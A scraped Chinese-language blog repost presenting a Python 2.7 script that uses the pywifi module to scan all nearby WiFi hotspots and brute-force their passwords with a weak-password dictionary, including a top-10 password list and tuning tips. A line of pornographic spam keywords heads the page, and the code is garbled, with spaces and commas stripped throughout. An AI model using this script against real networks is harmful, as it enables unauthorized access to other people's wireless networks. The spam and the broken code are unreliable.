中文字幕理论片,69视频免费在线观看,亚洲成人app,国产1级毛片,刘涛最大尺度戏视频,欧美亚洲美女视频,2021韩国美女仙女屋vip视频

打開APP
userphoto
未登錄

開通VIP,暢享免費電子書等14項超值服

開通VIP
WiFi密碼怎么破?一個Python腳本搞定

「短暫」的春節(jié)假期已經結束了,想必今天大家都已經開工了。新的一年,一起繼續(xù)學習 Python,雞年雄起~~

本文僅供大家參考,不要濫用哦。

原文:https://my.oschina.net/Apathy/blog/821039

環(huán)境準備

  • python 2.7

  • 湊合的 linux

  • 差不多的無線網卡

  • pywifi模塊

  • 弱口令字典

  • 清除系統(tǒng)中的任何 wifi 連接記錄 \ (非常重要 \ ! \ ! \ ! \ )

首先,這個模塊在 win 下有點雞肋,作者在調用 WLANAPI 時沒有做好 WLANSECURITYATTRIBUTES 的封裝,所以推薦在 linux 下跑,我測試所使用的是 Kali 2.0 自帶 python 2.7.6 ,可直接通過 pip install pywifi 安裝。

導入模塊

這里用的模塊就這三個。pywifi 的 wifiutillinux.py 腳本的 sendcmdtowpas 方法中的 if reply != b'OK\n':判斷需要修改,不然會有很多的提示信息。

  1. frompywifiimport*

  2. importtime

  3. importsys

字典準備

效率很重要,畢竟這東西跑起來可真慢,下面是天朝用的比較多的 wifi 弱口令 TOP 10:

  1. 12345678

  2. 123456789

  3. 88888888

  4. 1234567890

  5. 00000000

  6. 87654321

  7. 66668888

  8. 11223344

  9. 147258369

  10. 11111111

配置掃描器

推薦掃描時常可以設置在15-20秒之間。測試時常則可以自定義,考慮到認證速度于距離的關系,我一般設置在15左右,再久的也沒意義。到時候就算破解成功的熱點,信號也好不到哪里

  1. defmain:

  2. #掃描時常

  3. scantimes=3

  4. #單個密碼測試延遲

  5. testtimes=15

  6. output=sys.stdout

  7. #結果文件保存路徑

  8. files='TestRes.txt'

  9. #字典列表

  10. keys=open(sys.argv[1],'r').readlines

  11. print'|KEYS %s'%(len(keys))

  12. #實例化一個pywifi對象

  13. wifi=PyWiFi

  14. #選擇定一個網卡并賦值于iface

  15. iface=wifi.interfaces[0]

  16. #通過iface進行一個時常為scantimes的掃描并獲取附近的熱點基礎配置

  17. scanres=scans(ifacescantimes)

  18. #統(tǒng)計附近被發(fā)現(xiàn)的熱點數(shù)量

  19. nums=len(scanres)

  20. print'|SCAN GET %s'%(nums)

  21. print'%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s'%('-'*706'WIFIID'18'SSID OR BSSID'2'N'4'time'7'signal'10'KEYNUM'10'KEY''='*70)

  22. #將每一個熱點信息逐一進行測試

  23. forixinenumerate(scanres):

  24. #測試完畢后,成功的結果講存儲到files中

  25. res=test(nums-iifacexkeysoutputtesttimes)

  26. ifres:

  27. open(files'a').write(res)

掃描周圍熱點

  1. defscans(facetimeout):

  2. #開始掃描

  3. face.scan

  4. time.sleep(timeout)

  5. #在若干秒后獲取掃描結果

  6. returnface.scan_results

熱點測試

這里后續(xù)推薦將掃描過程數(shù)據入庫,防止重復掃描,且更加直觀。

  1. deftest(ifacexkeystuts):

  2. #顯示對應網絡名稱,考慮到部分中文名嘖顯示bssid

  3. showID=x.bssidiflen(x.ssid)>len(x.bssid)elsex.ssid

  4. #迭代字典并進行爆破

  5. fornkinenumerate(key):

  6. x.key=k.strip

  7. #移除所有熱點配置

  8. face.remove_all_network_profiles

  9. #講封裝好的目標嘗試連接

  10. face.connect(face.add_network_profile(x))

  11. #初始化狀態(tài)碼,考慮到用0會發(fā)生些邏輯錯誤

  12. code=10

  13. t1=time.time

  14. #循環(huán)刷新狀態(tài),如果置為0則密碼錯誤,如超時則進行下一個

  15. whilecode!=0:

  16. time.sleep(0.1)

  17. code=face.status

  18. now=time.time-t1

  19. ifnowts:

  20. break

  21. stu.write('\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s'%(6i18showIDcode5now7x.signal10len(key)-n10k.replace('\n''')))

  22. stu.flush

  23. ifcode==4:

  24. face.disconnect

  25. return'%-*s| %s | %*s |%*s\n'%(20x.ssidx.bssid3x.signal15k)

  26. returnFalse

案例

這里顯示本次測試使用了11個弱口令,并掃描到了20個熱點,然后開始坑爹的跑起來了

  • _ * WIFIID * _ 熱點的 id 號 每跑一個會減1

  • _ * SSID OR BSSID * _ 熱點的 ssid 名或 mac 地址

  • _ * N * _ 對熱點的連接狀態(tài),這個在

  • * _time_ * 當前所花去的時間

  • * _signal_ * 熱點的信號強度,若小越好

  • * _KEYNUM_ * 測試密碼的 id 每跑一個會減1

  • * _KEY_ * 當前測試的密碼

結果還不錯,各位的安全意識不像以前那么蛋疼了,掃出一兩個,其中一個還是自家的 - -

傳送門

后臺回復關鍵詞 wifi,即可獲取相關字典、源碼和模塊的分享鏈接。

題圖:pexels,CC0 授權。

本站僅提供存儲服務,所有內容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權內容,請點擊舉報。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
RouterSploit:一款可以滲透各個路由器和交換機的大殺器
Python程序員:沒有我蹭不成功的網。教你如何愉快的蹭到WIFI?
Python密碼暴力攻擊前導
免費的wifi熱點 賬號密碼
還在傻傻輸密碼?這可能是最快捷的連 WiFi 方法
【教程分享】教你如何查看已連接WIFI熱點的密碼
更多類似文章 >>
生活服務
熱點新聞
分享 收藏 導長圖 關注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點擊這里聯(lián)系客服!

聯(lián)系客服